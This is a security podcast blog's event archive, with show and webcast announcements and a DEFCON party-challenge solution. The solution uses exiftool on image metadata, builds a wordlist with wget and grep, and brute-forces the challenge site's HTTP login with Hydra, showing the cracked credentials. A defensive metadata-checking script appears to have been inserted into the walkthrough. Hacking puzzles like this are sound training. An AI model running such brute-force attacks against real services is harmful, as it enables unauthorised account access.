Recently in Upcoming Events Category

We'll chat with Belgian security blogger Didier Stevens about Google AdWords, PDF readers, Twitter-controlled Christmas trees and his unhealthy obsession with RFID tags. Watch us live at 19:30 EST, Thursday January 14th for Episode 183 of PaulDotCom Security Weekly.

[Image] Sensor overloaded after being exposed to the after effects of pizza and beer with PaulDotCom



Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- John, Darren, Mick, Carlos, Paul, & Larry

Practical Kung Fu Webcast Series


PaulDotCom is very excited to bring you several new webcast series starting next January. The webcasts will be produced, hosted, and performed by the members of PaulDotCom. In addition to the White Hat World webcasts, there will be several different topic-based webcasts that will highlight different areas of information security. The first two are sure to be a "smash hit" as we show you how to improve your skills in the areas of client-side penetration testing and web application assessments (and even avenge the death of your master). Information about each webcast, including the registration links, is below:


Title: Practical Client-Side Exploitation Kung Fu

Description: In this webcast we will explore the tools & techniques needed to perform successful client-side exploitation. Practical methods for information gathering, target selection, and exploit delivery will be covered.

Date: Thursday, January 21, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Core Security Technologies

Register Here: https://www1.gotomeeting.com/register/171250512


Title: Practical Web Application Pen Testing Kung Fu

Description: In this session John & Paul will guide you toward performing more successful web application penetration testing. You will learn how to balance automated tools with manual testing, strike the vulnerabilities with the highest chance of exploitation, and more!

Date: Tuesday, January 26, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Cenzic

Register Here: https://www1.gotomeeting.com/register/290940024

Train Your Systems Administrators



One of the great eye-opening moments for me in the past few years was learning that we are outnumbered. Not only does it appear that there is a non-stop wave of malware and evil sites constantly trying to infect our systems, but it seems like our user population is working against us as well by trying to click on every evil link or evil file they come upon. Because of this it is very easy to feel that the plight of today's security professional is a grim one. I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is that we get to work in one of the coolest fields.

If you don't think so... please get out. There are other people who would love to have your job.

However, I have also realized recently that we are not alone. There is another group of professionals that we work with every day that can help us. Our Administrator brethren are an untapped resource for the information security community. We need to start cross-training with them if we want to stand a chance against the onslaught of attacks and malware that we face on a daily basis.

There are a number of different ways to go about this. There are commercial training options for your systems administrators that are short and to the point. I will be teaching one of these classes online and another in New Orleans in January. Please see the below links for more information.

564 online.

564 in New Orleans with Mechanical Bull and Beads.


However, beyond the commercial options there is something that we should be doing as well. I recommend having weekly brown bag meetings where you can show your systems administrators some cool tricks for ideating an incident and they can show you some neat tricks for understanding the business application process flow of your organization. This tradeoff is beneficial because it illuminates both aspects of an organization, security and day-to-day administration.

Keep in mind that one of the greatest instructors of evil, the great Bastard Operator From Hell, was a Systems Administrator. There is much we can learn from them.

[Image: BOFH] So Much To Learn!

-strandjs

Please tune in live to hear Moxie Marlinspike talk with the PDC crew about his research, specifically how he has poked SSL with a hot pointer until it cries uncle.

The podcast will be recorded at 8:30 PM EDT on Friday, September 11, 2009. The live stream should be active around 20:45 EDT (8:45 PM Eastern). Please keep in mind that these times are estimates.


Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

Ustream: PaulDotCom UStream Channel

Icecast: PaulDotCom Radio

Please join us, enjoy the show live, and thanks for listening!

- John, Paul, Mick, Carlos & Larry

Please join us and Daniel Suarez, author of the runaway hit Daemon, Thursday night for Episode 165 of PaulDotCom Security Weekly. The live stream should be active around 18:45 EDT (6:45 PM), Thursday, August 27th. Please keep in mind that the recording time is an estimate.


Episode 165 will also feature a Tech Segment by John Strand, following up on his fabulous posting on 'Scanning through TOR'.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

Ustream: PaulDotCom UStream Channel

Icecast: PaulDotCom Radio

Please join us, enjoy the show live, and thanks for listening!

- John, Paul, Mick, Larry & Carlos.

PaulDotCom & Friends Present: Defcon 17 Podcaster Meetup Episode!


All:

For your listening pleasure I have (finally!) edited the podcaster meetup audio. You can hear the likes of:

[Photo]

At this meetup we took questions from the audience, performed strip teases, and did some general ranting.

[Photo]

Special guest appearance by none other than Twitchy!


Now that DEFCON 17 is over, we promised the solution to our party pass challenge. I know that many have been waiting patiently, so here it is:

Remember the original post? Here is the challenge in case you forgot.

As stated in the original post, everything that you needed to complete the challenge was in the posting. If you listen to our show, all of the tools you need to complete it were also discussed in previous episodes and technical segments! Of course, knowing our recent projects and humor makes it all that much easier.

Enter document metadata. Remember that nice badge picture?

party_badge.jpg

Save it to disk and run exiftool on it as follows:

exiftool -r -a -u -g1 party_badge.jpg
or, at an absolute minimum:
exiftool party_badge.jpg

This command will give all sorts of information about the picture. A shortened version is shown below.

ExifTool Version Number         : 7.23
File Name                       : party_badge.jpg
File Size                       : 189 kB
File Modification Date/Time     : 2009:08:07 10:40:07
File Type                       : JPEG
MIME Type                       : image/jpeg
JFIF Version                    : 1.2
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : http://www.captainmetadata.com
Camera Model Name               : http://www.freelarrypesce.com
X Resolution                    : 100
Y Resolution                    : 100
User Comment                    : http://www.defconpartychallenge.com
Flashpix Version                : 0100
Color Space                     : Uncalibrated
GPS Version ID                  : 2.2.0.0
GPS Latitude                    : 413551403 deg 0' 0.00"
GPS Longitude                   : 413551403 deg 0' 0.00"
GPS Map Datum                   : 0413551403
Quality                         : 100%
Image Size                      : 553x465
GPS Position                    : 413551403 deg 0' 0.00", 413551403 deg 0' 0.00"

Well, look at that. Three websites! Let's take a look at them, one at a time.

http://www.defconpartychallenge.com: We are presented with a pop up requiring authentication via username and password. Hmmm. Let's move on for a bit.

http://www.freelarrypesce.com: A Clue!

Need a password? It is the unique number from Larry's RFID implant. There are multiple ways to obtain it, but here are a few suggestions.
   1. Find it mentioned somewhere.
   2. Ask someone other than the PDC crew if they know it.
   3. As a last resort, ask to read Larry's RFID tag at DEFCON (EM4x05 series tag, and if asked, he'll let you)
   4. Re-read the blog post. 

Ok, those we can do! So, where to find the RFID tag unique number? Well, one option was to actually read Larry's tag. You could have asked someone if they knew it, such as Major Malfunction, who cloned Larry's tag on stage at Shmoocon. Then there was the "find it mentioned somewhere". The tag number was featured in TWO videos; once in the implant procedure, and the other from the Shmoocon cloning video.

Wow, that was hard. Downloading and watching all those videos. But, wait Larry, you told me everything I needed was in the blog post!

It was.

Look at the image again with exiftool. See these funny numbers?

GPS Version ID                  : 2.2.0.0
GPS Latitude                    : 413551403 deg 0' 0.00"
GPS Longitude                   : 413551403 deg 0' 0.00"
GPS Map Datum                   : 0413551403

Well, if you plug that location into Google Maps, it is in the middle of an ocean somewhere. But what about the GPS map datum? A quick Google search would reveal that that is a VERY odd datum type. In fact, so odd that it isn't valid.

So, there is the password: 0413551403

Yes, the password is in the image metadata several times, but most of them without the leading zero! Yeah, I got lazy, and just started pumping the number in to various interesting fields, until one kept the leading zero...
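The flip side of the trick above is what a defender can screen for before images leave (or enter) an organisation. As an added example, not code from the post, the script below parses exiftool's key/value output (constructed here from the lines quoted above) and flags the same oddities: URLs in free-text tags, coordinates outside the valid range, and a map datum that is not a recognised datum name. KNOWN_DATUMS is an assumed allow-list of common datum strings.

```python
import re

# Constructed sample: the exiftool key/value lines quoted in the post above.
SAMPLE = """\
Image Description               : http://www.captainmetadata.com
Camera Model Name               : http://www.freelarrypesce.com
User Comment                    : http://www.defconpartychallenge.com
GPS Latitude                    : 413551403 deg 0' 0.00"
GPS Longitude                   : 413551403 deg 0' 0.00"
GPS Map Datum                   : 0413551403
Image Size                      : 553x465
"""

# Assumed allow-list of datum names a camera would normally write.
KNOWN_DATUMS = {"WGS-84", "WGS84", "NAD83", "NAD27", "ED50", "TOKYO"}
# Tags that should carry a short description, not a link.
FREE_TEXT_TAGS = ("Image Description", "Camera Model Name", "User Comment",
                  "Artist", "Copyright")
URL_RE = re.compile(r"https?://\S+", re.I)

def parse_exiftool(text):
    """Turn 'Tag Name : value' lines into a dict; the first colon splits."""
    tags = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            tags[key.strip()] = value.strip()
    return tags

def degrees(value):
    """Leading degree count of a GPS value such as 41 deg 0' 0.00"; None if absent."""
    m = re.match(r"(-?\d+(?:\.\d+)?)\s*deg", value or "")
    return float(m.group(1)) if m else None

def find_anomalies(tags):
    """Return (tag, reason) pairs for values a camera would not have written."""
    findings = []
    for tag in FREE_TEXT_TAGS:
        if tag in tags and URL_RE.search(tags[tag]):
            findings.append((tag, "URL in free-text tag"))
    for tag, limit in (("GPS Latitude", 90), ("GPS Longitude", 180)):
        deg = degrees(tags.get(tag))
        if deg is not None and abs(deg) > limit:
            findings.append((tag, "out of range"))
    datum = tags.get("GPS Map Datum", "")
    if datum and datum.upper().replace(" ", "") not in KNOWN_DATUMS:
        findings.append(("GPS Map Datum", "not a known datum"))
    return findings
```

Run `find_anomalies(parse_exiftool(SAMPLE))` on the badge's metadata and all six planted fields come back flagged; a normal photo with a WGS-84 datum and sane coordinates yields an empty list.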

On to our next clue.

http://www.captainmetadata.com/

Need a username? Like we told you, EVERYTHING you needed was in the blog post.

Hmm, I seem to remember those crafty PaulDotCom guys talking about creating custom username and password lists from web pages... Ok, so how do I do that? In Episode 129, we talked about creating a custom wordlist. If we concatenate all of the commands (for unix text processing and wget) and use the single blog entry as a source, we get:

# 1. mirror the single blog entry (one link level deep)
wget -r -l 1 http://pauldotcom.com/2009/07/the-pauldotcomi-hacked-defcon.html
# 2. split every fetched file into one token per line
grep -hr "" pauldotcom.com/ | tr '[:space:]' '\n' | sort -u > wordlist.lst
# 3. drop tokens containing markup/punctuation characters
egrep -v '[],;{}<>:="/[]' wordlist.lst | sort -u > wordlist.clean.lst

Ouch.

Note that we did not use john the ripper to add additional passwords to the list as we did in Episode 129. Technically it wouldn't hurt, but the word was already in the page, no additional words needed.

Now that we have a wordlist and a password, we can brute force the login with Hydra, which we mentioned in the White Hat World's Best Of Network Penetration Testing Tools:

hydra -s 80 -L wordlist.clean.lst -p 0413551403 -t 36 defconpartychallenge.com http-head /index.html

Woohoo! We get results back!

Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-07 13:25:44
[DATA] 36 tasks, 1 servers, 2249 login tries (l:2249/p:1), ~62 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 66.203.130.200   login: strippers   password: 0413551403
[STATUS] attack finished for defconpartychallenge.com (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-07 13:25:52

See, I told you strippers were awesome. Now go log in to the website with your credentials, and retrieve the picture that pays.


Mmmm, BACON! Two varieties, beans and mints! YOU WIN!

I hope you all enjoyed the challenge, even if you weren't going to DEFCON, or didn't get to complete it. We know a lot of you want PaulDotCom baubles so we are attempting to run another batch of "party badges" that we can exchange for a modest fee (to cover materials and postage). Stay tuned!

- Larry "haxorthematrx" Pesce

PaulDotCom Hacklab in Boston


PaulDotCom will be running a Hacklab in Boston at SANS Boston 2009 hosted by strandjs this Friday August 7th from 6:00PM till ???. "Hack Naked" T-shirts will be on sale for $10!


We will be at the:

Hyatt Regency Boston
One Avenue de Lafayette
Boston, Massachusetts, USA 02111
Telephone: 617 912 1234
Fax: 617 451 2198

The event will take place on the fourth floor. This event is open to the public, so come on down and hack some systems. Better yet, bring some cool systems to hack.

That and it is kind of my birthday.

-strandjs


The invite only DEFCON Party will be held at:

Saturday, August 1st
The Riviera Skybox 207/208
22:00 to 03:00

This will be immediately following the Podcaster's Meetup, where tons of prizes are being given away, so you may want to come early.

NOTE: Due to Hotel and State regulations, because alcohol is being served at this event, we do need to limit it to a 21+ event.

Need an invite? Here's the (easy) challenge. We do also have a limited guest list for our distinguished VIPs. Again, want to get on that list, see the challenge posting for hints.

PDC/SANS Hacklab in Denver!!!!


PaulDotCom will be running a live Hacklab event from
SANS Denver this Sunday (07/12) from 6:30 till ??? @:

Grand Hyatt Downtown Denver
Second floor conference center
Longs Peak room.

There will be a network and systems for people to attack. We may even
throw in a cool presentation or two.

Come on down and check it out.

-strandjs